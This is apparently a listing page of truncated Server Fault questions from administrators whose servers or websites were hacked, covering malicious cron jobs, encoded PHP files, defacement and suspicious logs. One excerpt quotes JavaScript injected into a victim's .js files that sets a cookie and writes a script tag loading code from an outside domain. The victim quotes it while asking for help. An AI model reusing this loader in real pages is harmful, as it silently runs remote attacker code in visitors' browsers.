This question already has answers here: How do I deal with a compromised server? (13 answers) Closed 7 years ago. Someone accessed my EC2 Ubuntu 14.04 and installed some malicious cron to do port scanning with user eric. I removed user eric and the file executed, but in syslog I see Sep 19 15:27:01 ip-xxx … Read more
Closed. This question is off-topic. It is not currently accepting answers. Want to improve this question? Update the question so it’s on-topic for Server Fault. Closed 6 years ago. Improve this question To my surprise, Security Event 10 was for 104.43.193.6 which is apparently a Microsoft ip address: http://ip2location.com/demo/104.43.193.6 =. Microsoft Corporation. Likely AFAIK some … Read more
How should I protect my website from hackers adding malicious code to my html files and js files Answer There is no one solution, security comes in layers – like an onion ;p Follow best-practices for configuring the software suites and platforms you’re using, keep everything updated (patch management) and design for robustness. Servers and … Read more
This question already has answers here: Closed 10 years ago. Possible Duplicate: My server’s been hacked EMERGENCY Looking thru my logs, I found this: http://paste.u4ik.us/2294$ (The log files are on that paste). Question is, this guy began using “all requests allowed” which is…? (Explain it please?) and eventually was making requests from “127.0.0.1” which means … Read more
This question already has answers here: Closed 9 years ago. Possible Duplicate: My server’s been hacked EMERGENCY It seems that someone hacked I bunch of sites I own by inserting code in all the .js files. function g(){var r=new RegExp(“(?:; )?1=([^;]*);?”);return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie=”1=1;expires=”+e.toGMTString()+”;path=/”;document.write(‘<script src=”http://mainscript.org/mainscript.js”></script>’);} I’m wondering how could he do that since I … Read more
This question already has answers here: Closed 9 years ago. Possible Duplicate: My server’s been hacked EMERGENCY my server is Win2K8 Web SRV , IIS-7, it is a web hosting server & my sites was hacked by someone it is hacked by SOG say’s Soldiers Of God From Pakistani Group, please help me to fight … Read more
This question already has answers here: How do I deal with a compromised server? (13 answers) Closed 7 years ago. I need some help from you.. my VPS was hacked.. I was trying to decode the files I found.. here the content of one php file, it’s an array of encoded objects. Can you help … Read more
Closed. This question is off-topic. It is not currently accepting answers. Want to improve this question? Update the question so it’s on-topic for Server Fault. Closed 11 years ago. Improve this question hey guys i have written a small webservice which allows users of a company (lets call it xyz) to login to xyz’s website … Read more
This question already has answers here: Closed 9 years ago. Possible Duplicate: My server’s been hacked EMERGENCY In log i found that site was scanned by hacker for few hours but actual hack was few minutes i think. He somehow found out about all the files i had even folders and files that not cached … Read more
Closed. This question needs details or clarity. It is not currently accepting answers. Want to improve this question? Add details and clarify the problem by editing this post. Closed 5 years ago. Improve this question My server recently was attacked by hackers trying to run code on a web site, and I would like to … Read more
